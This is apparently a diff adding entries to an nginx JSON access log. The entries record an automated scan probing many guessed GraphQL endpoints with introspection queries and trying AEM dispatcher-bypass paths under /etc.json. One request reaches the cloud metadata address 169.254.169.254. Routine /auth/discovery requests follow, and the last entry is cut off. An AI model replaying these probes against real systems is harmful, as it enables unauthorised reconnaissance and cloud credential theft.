+{"@timestamp": "18/May/2022:06:08:12 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:12 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphql/console HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:12 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphql/schema.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:12 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphql/schema.xml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:12 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphql/schema.yaml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:12 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:12 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/subscriptions HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:12 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/altair HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:12 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/api/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json/FNZ.png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.062","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json/FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.1.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc....4.2.1....json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.json?FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.json?FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.json/FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:13 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.069","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:13 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graph HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.json/FNZ.png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.038","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.json/FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:14 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphiql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.047","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:14 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphiql.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:14 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphiql.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:14 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphiql.min.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.042","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.1.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children....4.2.1....json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json?FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json?FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json?FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json/FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"169.254.169.254","request":"GET http://169.254.169.254/metadata/instance?api-version=2021-02-01 HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"11.571","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json/FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json/FNZ.png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json/FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:15 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphiql.min.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.068","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:15 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphiql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:15 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphiql/finland HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:15 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:16 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphql-explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.037","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:16 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:17 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphql/console HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:17 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphql/schema.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:17 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphql/schema.xml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:17 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphql/schema.yaml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:17 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:17 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/subscriptions HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:11:31:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.314","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:11:31:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.385","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:11:31:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"1.783","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:11:31:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.411","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:11:31:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"1.429","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:11:31:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.449","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:11:32:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.381","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:12:02:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.399","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:12:08:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.068","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:12:08:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.325","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:12:08:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.363","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:12:08:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.712","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:12:08:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.344","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:12:08:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"1.349","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:12:09:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"1.735","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:12:09:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.329","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:12:39:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.577","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:13:04:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"502","body_bytes_sents":"154","req_time":"0.003","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:13:04:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.056","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:13:04:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.069","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:13:04:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.070","http_user_agent":"-", "http_referer":"-", "request_method":"GET", 